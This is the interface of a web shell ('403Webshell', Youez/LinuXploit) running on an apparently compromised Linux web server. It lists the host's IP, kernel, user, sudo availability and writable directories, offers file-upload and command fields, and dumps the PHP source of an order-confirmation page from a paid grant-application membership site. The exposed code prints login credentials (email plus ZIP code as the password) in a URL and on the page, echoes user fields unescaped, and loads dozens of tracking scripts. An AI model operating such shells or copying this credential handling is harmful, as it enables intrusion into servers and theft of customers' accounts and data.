403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/usagrantapplications.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/usagrantapplications.org/confirm_v4.php
<?php
session_start();
////////////////////////////////////////////////////////////////////////////////////////
require_once($_SERVER['DOCUMENT_ROOT'].'/inc/globals.php');                           //
$title = '';                                                                          //
$body_class = 'confirm';															  //
require_once($_SERVER['DOCUMENT_ROOT'].'/v4/header.php');														  //
////////////////////////////////////////////////////  New Site Stuff  //////////////////
# confirm.php is displayed when the order was successful. It is called from order.php

$today = date("m-d-Y");

require_once("{$_SERVER["DOCUMENT_ROOT"]}/tracker/client/TrackerLib.php");

$tracker = new TrackerLib("usaga");

$params = $tracker->URLParameters();
$trackerparams = $tracker->TrackerParameters();

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<title>USA Grant Applications.org Membership Confirmation</title>
<SCRIPT language="JavaScript" type="text/javascript">

<!-- Yahoo! Inc.

window.ysm_customData = new Object();

window.ysm_customData.conversion = "transId=,currency=,amount=24.95";

var ysm_accountid  = "1JNT41KIT5D74T6SKLOPJMOLEPG";

document.write("<SCR" + "IPT language='JavaScript' type='text/javascript' "

+ "SRC=//" + "srv1.wa.marketingsolutions.yahoo.com" + "/script/ScriptServlet" + "?aid=" + ysm_accountid

+ "></SCR" + "IPT>");

// -->

</SCRIPT>
</head>
<?
/////////////////////////////////////////////New Site Stuff////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
																																																																				///
																																																																				///
																																																																				
?>
<body>


    	<div class="main">
    	<div class="main_">
        
        	<h1>Registration Complete</h1>
            <p>Congratulations! You are on your way to applying for Funding!</p>
            <p>Below is your Account Information that will allow you to access the Member's Site right now!</p>
            <br />
			
            <h2>Credit Card Info</h2>
            <center style="padding:10px 0px;">
			<h3 style="padding-right:5px;">Your Credit Card Statement will display:</h3>
			<div style="font-size:24px;">
			<?php
				include_once($_SERVER['DOCUMENT_ROOT'] . "/vx/lib/dinc.php");
				$res = $db->query("SELECT cc_descriptor FROM lc2{$_SITE_CODE}_lc.lc_billing WHERE client_id='".clean($user_id)."' ORDER BY bill_time DESC LIMIT 1");
				echo (empty($res[0]['cc_descriptor'])) ? 'USFUND.ORG 800-337-3471' : $res[0]['cc_descriptor'];
			?>
			</div>
			</center>
            
            <p>If you have any questions please call: <strong>888-364-1167</strong></p>
			<br /><br />
            
            <form id="login" onsubmit="return false">
				
                <h2>USA Grant Application User Account Info:</h2>
				<div class="fullWidth" style="margin-bottom:15px;">
					<center>
					<h3>To View the Funding Applications and Start Applying,</h3>
					<a href="https://<?= $_SERVER['SERVER_NAME']; ?>/login.php?user=<?= $cc_email; ?>&pass=<?= $cc_zip; ?><?= ($_SESSION['upsell_tracking_version']=='site order after') ? '&upsell=1' : '';?>" style="border-radius:10px;padding:2px 25px;background:#d00305;color:white;font-size:24px;text-decoration:none;" onmouseover="this.style.background = '#aa0000';" onmouseout="this.style.background = '#d00305';">Click Here to Login</a>
					</center>
				</div>
                <div class="fullWidth">
					<div class="thirdWidth left">Website:</div>
                    <a style="color:black; font-size:12px;" href="https://www.usagrantapplications.org/login.php">https://www.usagrantapplications.org/login.php</a>
                </div>
                <div class="clear_left"></div>
                <div class="fullWidth">
                    <div class="thirdWidth left">Username:</div>
                    <p><?= $cc_email; ?></p>
                </div>
                <div class="clear_left"></div>
                <div class="fullWidth">
                    <div class="thirdWidth left">Password:</div>
                    <p><?= $cc_zip; ?></p>
                </div>
                <div class="clear_left"></div>

			</form>

            <div id="summary" class="sub_section form_section">
                <h2>Personal Information Summary:</h2>
                <div class="fullWidth">
                    <div class="halfWidth left">First Name:</div>
                    <p><?= $cc_fname; ?></p>
                </div>
                <div class="clear_left"></div>
                <div class="fullWidth">
                    <div class="halfWidth left">Last Name:</div>
                    <p><?= $cc_lname; ?></p>
                </div>
                <div class="clear_left"></div>
                <div class="fullWidth">
                    <div class="halfWidth left">Email:</div>
                    <p><?= $cc_email; ?></p>
                </div>
                <div class="clear_left"></div>
                <div class="fullWidth">
                    <div class="halfWidth left">Phone Number:</div>
                    <p><?= $cc_phonearea; ?>-<?= $cc_phoneprefix; ?>-<?= $cc_phoneextension; ?></p>
                </div>
                <div class="clear_left"></div>
                <div class="fullWidth">
                    <div class="halfWidth left">Address:</div>
                    <p><?= $cc_addr; ?></p>
                </div>
                <div class="clear_left"></div>
                <div class="fullWidth">
                    <div class="halfWidth left">City:</div>
                    <p><?= $cc_city; ?></p>
                </div>
                <div class="clear_left"></div>
                <div class="fullWidth">
                    <div class="halfWidth left">State:</div>
                    <p><?= $cc_state; ?></p>
                </div>
                <div class="clear_left"></div>
                <div class="fullWidth">
                    <div class="halfWidth left">Zip:</div>
                    <p><?= $cc_zip; ?></p>
                </div>
                <div class="clear_left"></div>
                <br />
			</div>
            <br /><br />
            

            <div id="summary" class="sub_section form_section">
                <h2>Payment Information Summary:</h2>
                <div class="fullWidth">
                    <div class="halfWidth left">Credit Card Number:</div>
                    <p><?= $partial_cc_num; ?></p>
                </div>
                <div class="fullWidth">
                    <div class="halfWidth left">Expiration Date:</div>
                    <p><?= $cc_month; ?> / <?= $cc_year; ?></p>
                </div>
                <div class="fullWidth">
                    <div class="halfWidth left">Amount:</div>
                    <p>$<?= $_INITIAL_FEE; ?></p>
                </div>
			</div>
            <br /><br />
            
            <div id="summary" class="sub_section form_section">
                <h2>Customer Service Contact Information</h2>
                <div class="fullWidth">
                    <div class="halfWidth left">Toll Free Number:</div>
                    <p>888-261-4837</p>
                </div>
                <div class="fullWidth">
                    <div class="halfWidth left">Email Address:</div>
                    <a style="color:black; font-size:12px;" href="mailto:support@usagrantapplications.org">support@usagrantapplications.org</a>
                </div>
			</div>
            <br /><br />
            
            <small>
				You will have access to the applications and training through the <strong>USA Grant Applications</strong> site 
				for the next month for your processing fee of $<?= $_INITIAL_FEE; ?>. By ordering today you understand that you are 
				enrolling into the Exclusive USA Grant Applications Membership Resource Center where we provide you application resources for hundreds 
				of different funding options. <strong>WE ALSO HAVE A GUARANTEE. <u>If you don't qualify for 
				a Free Funding Program, you will be refunded immediately</u>.</strong> Just provide us with the funding application you applied for and the 
				response letter from the funder. <strong>Either you qualify for the Free Funding Program or you will have your 
				payment refunded to you.</strong>
			</small>

        </div>
        </div>
<?php if(!empty($cc_lead_id)) { ?>
<img src="https://www.surfcrm.com/lcapi/FormConfirmationPageTracking.php?site=usaga&lead_id=<?= $cc_lead_id;?>&client_id=<?= $user_id;?>&form_url=<?= urlencode('/confirm_v4.php');?>" />
<?php } ?>
<?php require_once($_SERVER['DOCUMENT_ROOT'].'/v4/footer.php');?>        
<?
																	//																																																																																																																																																																														 	 ///
																	//																																																																																																																																																																															 ///
/////////////////////////////////////////////New Site Stuff/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
?>


<img src="https://www.surfcrm.com/tracker/server/tracker.php?spt_saleamount=24.95<?= $trackerparams; ?>">
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-6317376-1");
pageTracker._trackPageview('/confirm_v4.php');
} catch(err) {}</script>
<!-- Google Code for USA Sale Conversion Page -->
<script language="JavaScript" type="text/javascript">
<!--
var google_conversion_id = 1033273468;
var google_conversion_language = "en_US";
var google_conversion_format = "1";
var google_conversion_color = "ffffff";
var google_conversion_label = "-_gsCMrKnwEQ_IDa7AM";
if (24.95) {
var google_conversion_value = 24.95;
}
//-->
</script>
<script language="JavaScript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
<noscript>
	<img height="1" width="1" border="0" src="https://www.googleadservices.com/pagead/conversion/1033273468/?value=24.95&amp;label=-_gsCMrKnwEQ_IDa7AM&amp;guid=ON&amp;script=0"/>
</noscript>
<!-- 
<script type="text/javascript"> 

  syndConversionType = '101';
  syndAccountID = '883391';
  syndDomain = 'https://ads.ask.com';
  syndFunnelValue = '100';

</script>
 -->
<script type="text/javascript"> 
<!--// 
  syndConversionType = '101';
  syndAccountID = '1055744';
  syndDomain = 'https://ads.ask.com';


  syndFunnelValue = '100';
  syndDollarValue = '24.95';
//-->
</script>
<script src="https://ads.ask.com/scripts/convTracking.js" type="text/javascript"></script>

<!-- Tracking code for MSN //-->
<SCRIPT>
microsoft_adcenterconversion_domainid = 392263;
microsoft_adcenterconversion_cp = 5050;
</script>

<SCRIPT SRC="https://0.r.msn.com/scripts/microsoft_adcenterconversion.js"></SCRIPT>
<NOSCRIPT><IMG width=1 height=1 SRC="https://392263.r.msn.com/?type=1&cp=1"/></NOSCRIPT><center><a href="http://advertising.msn.com/MSNadCenter/LearningCenter/adtracker.asp" target="_blank">::adCenter::</a></center>

<script>
	window.uetq = window.uetq || []; window.uetq.push({ 'ec': 'Sale', 'ea': 'ConfirmationPageLoad', 'el': 'Sale', 'ev': 34.95 });}
</script>
<!-- 7Search Code for Conversion Page (start) -->
<script language="JavaScript" type="text/javascript">
var _7search_conversion_advid = 156114;
var _7search_conversion_type = "purchase";
var _7search_conversion_value = 1;
</script>
<script language="JavaScript" type="text/javascript" src="https://conversion.7search.com/conversion/v1/conversion.js"></script>
<noscript><img width="1" height="1" border="0" src="https://conversion.7search.com/conversion/v1/?advid=156114&urlid=&type=purchase&value=1&noscript=1" /></noscript>
<!-- 7Search Code for Conversion Page (end) -->

<script type="text/javascript" src="https://admin.abcsearch.com/af/saletrack.pl?username=USAGRANTAPPLICATIONS"></script>
<script type="text/javascript">
	var cbjspath = "static.chartbeat.com/js/chartbeat.js?uid=931&domain=usagrantapplications.org";
	var cbjsprotocol = (("https:" == document.location.protocol) ? "https://s3.amazonaws.com/" : "http://");
	document.write(unescape("%3Cscript src='"+cbjsprotocol+cbjspath+"' type='text/javascript'%3E%3C/script%3E"))
</script>
<script language="javascript" type="text/javascript" src="https://admin.advertise.com/af/saletrack.pl?username=USAGRANTAPPLICATIONS"></script>
<script language="javascript" type="text/javascript" src="http://www.usagrantapplications.org/vsa/sale.php?cid=1"></script>
<script src="https://adreadytractions.com/pt/46191/?h=5e45572f461453c9712a" language="JavaScript"></script>

<!-- Begin MIVA Ad Analyzer Code -->
<script type="text/javascript">
	<!--
	var mv_cnv = 1;
	var mv_aid = 197149;
	var mv_uid = '49687f6c-1690-478d-9c11-0e3b27d01074';
	if (location.href.substr(0,5) == "https")
	{var secure = "s"}
	else
	{var secure = ""}
	var mv_cb = Math.random() + "";
	document.write('<img src="http'+secure+'://mv.bidsystem.com/ppc/sendtracker.aspx?c='+mv_aid+'&conversion='+mv_cnv+'&w=p3p&cb='+mv_cb+'&u='+mv_uid+'" border="0" hspace="0" vspace="0">');
	// -->
</script>
<!-- End MIVA Ad Analyzer Code -->
<!-- Begin MIVA Ad Analyzer Code -->
<script type="text/javascript">
<!--
var mv_cnv = 1;
var mv_aid = 209160;
var mv_uid = 'ca48b58d-71fc-43cc-96ca-11b5c018deb5';
if (location.href.substr(0,5) == "https")
{var secure = "s"}
else
{var secure = ""}
var mv_cb = Math.random() + "";
document.write('<img src="http'+secure+'://mv.bidsystem.com/ppc/sendtracker.aspx?c='+mv_aid+'&conversion='+mv_cnv+'&w=p3p&cb='+mv_cb+'&u='+mv_uid+'" border="0" hspace="0" vspace="0">');
// -->
</script>
<!-- End MIVA Ad Analyzer Code -->
<!-- Begin MIVA Ad Analyzer Code -->
<script type="text/javascript">
<!--
var mv_cnv = 0;
var mv_aid = 209160;
var mv_uid = 'ca48b58d-71fc-43cc-96ca-11b5c018deb5';
if (location.href.substr(0,5) == "https")
{var secure = "s"}
else
{var secure = ""}
var mv_cb = Math.random() + "";
document.write('<img src="http'+secure+'://mv.bidsystem.com/ppc/sendtracker.aspx?c='+mv_aid+'&conversion='+mv_cnv+'&w=p3p&cb='+mv_cb+'&u='+mv_uid+'" border="0" hspace="0" vspace="0">');
// -->
</script>
<!-- End MIVA Ad Analyzer Code -->
<!-- Start FinditQuick Conversion Tracking -->
<script type='text/javascript'>
document.write('<img src="http://www.findit-quick.com/cgi-local/conversions_tracking.cgi?rf=' + encodeURIComponent(document.location) + '&r=' + Math.round(Math.random() * 10000000000000000) + '&pub=3201668354" width="1" height="1" border="0">');
</script>
<!-- End FinditQuick Conversion Tracking -->
<!-- Start FinditQuick Conversion Tracking -->
<script type='text/javascript'>
document.write('<img src="https://www.findit-quick.com/cgi-local/conversions_tracking.cgi?rf=' + encodeURIComponent(document.location) + '&r=' + Math.round(Math.random() * 10000000000000000) + '&pub=3201668354" width="1" height="1" border="0">');
</script>
<!-- End FinditQuick Conversion Tracking -->
<img height="1" width="1" border="0" src="https://bidsystem.adknowledge.com/conversion.php?cid=6cc790bb-eae8-4ee1-b424-6002781a9afb" />
<script type="text/javascript">if (!window.mstag) mstag = {loadTag : function(){},time : (new Date()).getTime()};</script> <script id="mstag_tops" type="text/javascript" src="//flex.atdmt.com/mstag/site/526e5291-5190-41dd-853f-1303889a7d45/mstag.js"></script> <script type="text/javascript"> mstag.loadTag("conversion", {cp:"5050",dedup:"1"})</script> <noscript> <iframe src="//flex.atdmt.com/mstag/tag/526e5291-5190-41dd-853f-1303889a7d45/conversion.html?cp=5050&dedup=1" frameborder="0" scrolling="no" width="1" height="1" style="visibility:hidden; display:none"> </iframe> </noscript>
<script>(function(w,d,t,r,u){var f,n,i;w[u]=w[u]||[],f=function(){var o={ti:"5317870"};o.q=w[u],w[u]=new UET(o),w[u].push("pageLoad")},n=d.createElement(t),n.src=r,n.async=1,n.onload=n.onreadystatechange=function(){var s=this.readyState;s&&s!=="loaded"&&s!=="complete"||(f(),n.onload=n.onreadystatechange=null)},i=d.getElementsByTagName(t)[0],i.parentNode.insertBefore(n,i)})(window,document,"script","//bat.bing.com/bat.js","uetq");</script><noscript><img src="//bat.bing.com/action/0?ti=5317870&Ver=2" height="0" width="0" style="display:none; visibility: hidden;" /></noscript>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit